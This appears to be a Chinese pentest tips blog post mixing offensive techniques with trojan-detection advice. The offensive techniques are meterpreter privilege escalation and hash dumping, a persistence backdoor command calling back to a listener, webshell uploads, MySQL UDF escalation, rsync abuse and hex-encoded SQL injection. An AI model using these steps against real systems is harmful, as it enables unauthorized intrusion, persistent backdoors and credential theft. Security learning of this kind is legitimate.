滲透測試筆記四
滲透筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學習心得。為保證質量,每一篇為20條左右的滲透小記。
1、在Webshell中,如果上傳文件時提示缺少對象。可以嘗試寫一句話,用菜刀連接之后用菜刀上傳文件。
2、使用meterpreter的hashdump提取windows口令的哈希值:
- meterpreter > getuid //獲知當前權限級別
- meterpreter > getsystem //提升權限
- meterpreter > run hashdump
3、網站http://www.md5decrypter.co.uk/,可提供對NTLM/LM hash值的在線解密(小編注:這個網站破解MD5的命中率也很高哦)。
3、使用meterpreter建立后門:
- meterpreter > run persistence -A -S -U -i 60 -p 4321 -r 192.168.1.1
- -A參數用于在攻擊方機器上自動啟動監聽程序。
- -S參數表示將后門程序設置為Windows系統啟動時加載。
- -U參數表示后門設置為用戶登陸系統時自動執行。
- -i參數用于設置后門回連到代理處理程序的時間間隔
- -p是端口號
- -r是目標機器的ip地址
4、網絡縱深防御思想:作為一個公司,它會為物理線路聘用一個巡線員(第一層),在工作組交換機上做端口安全(第二層),在邊界路由器上做訪問列表(第三層),在防火墻中建立DMZ區和包過濾(第四層),設置IDS/IDP監測/阻攔(第三至七層),建立SSL通道(第六層),設置內容過濾(第七層),提供AAA服務(第七層),進行漏洞掃描(第四至七層)和病毒掃描(第七層)等。
——摘自《IT安全面試攻略》
5、IPS設備可以提供攻擊檢測和防御兩種功能,如果以鏡像方式接入,就使用反應機制;如果以串行方式接入,就使用阻斷機制。
6、根據ip獲知對方電腦的名稱:ping -a ip地址,
如:ping -a 192.168.235.253

7、在系統“windows”文件夾下,點擊打開“system.ini”文件,在代碼中如果有[boot]代碼,其中shell語句的格式一般為“shell=文件名”,如果后面還跟有一個文件名(如shell=文件名+文件名),則很可能是木馬程序。
8、在系統“windows”文件夾下,點擊打開“win.ini”文件,在代碼中如果有“run=?”或者“load=?”代碼類型,一定要注意其后的文件。一般情況下,“run=”和“load=”后面就沒有內容了,如果有路徑或不熟悉的文件名,可能就是木馬程序。
9、木馬隱藏的方式很多,一般都隱藏在注冊表的
1HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
目錄下。查看鍵值中有沒有不熟悉的可執行文件,該類文件可能就是木馬程序。
10、專門捕獲網頁的嗅探器——艾菲網頁偵探:艾菲網頁偵探是一個HTTP協議的網絡嗅探器,專門捕捉局域網中含有HTTP協議的數據包,并對其進行分析,找出符合過濾器的那些HTTP通信內容。
11、常見的windows XP系統漏洞:RDP漏洞、遠程明文賬戶名傳送漏洞、UPnP緩沖溢出漏洞、熱鍵漏洞、拒絕服務漏洞
12、常見window 7系統漏洞:內核驅動程序中的漏洞、輔助驅動程序中的漏洞、IE的積累性安全更新漏洞、顏色控制面板中的漏洞、.NET和Silverlight中的漏洞、SharePoint中的漏洞。
13、清除BIOS密碼之魔法攻擊法:如果你能進入系統,可以用BiosPwds、CmosPwd等軟件清除。(小編注:一般就別想了)
14、清除BIOS密碼之物理攻擊法:關閉電源,將主板上的正確跳線帽用專業工具挑出,將跳線帽由原來標示為“1”、“2”針腳套在標示為“2”、“3”的針腳上,再將跳線帽復原,打開電源,即可發現BIOS密碼已清除。如果遇到較老的機子,可是拆掉電池、再用導電工具短接清除密碼。
15、mysql數據庫擁有讀寫文件權限時,成功寫入文件的條件需單引號不轉義、不可覆蓋已存在文件、必須為最后一條語句。因此magic_quotes_gpc必須為0ff。
16、滲透提權過程中,得知mysql數據庫連接賬號和密碼時可以嘗試UDF方式提權,前提是系統必須為windows。當然如果權限高的話,還可以使用mof寫入系統的方式提權。
17、滲透過程中如目標開啟rsync服務,默認873端口,可嘗試無口令登錄,權限設置不足的可直接上傳文件,最不濟也可查看目標站點文件。
18、端口轉發時如果lcx不起作用,可嘗試reduh這個工具,不過速度稍微有點捉急!(其實那速度會讓你有砸鍵盤的沖動)
19、數字型注入中,無單引號注入方法有兩種,一種是定義注入字符串為16進制賦值變量@r,然后exec(@r)執行;另外一種是使用char()函數和“+”號來進行。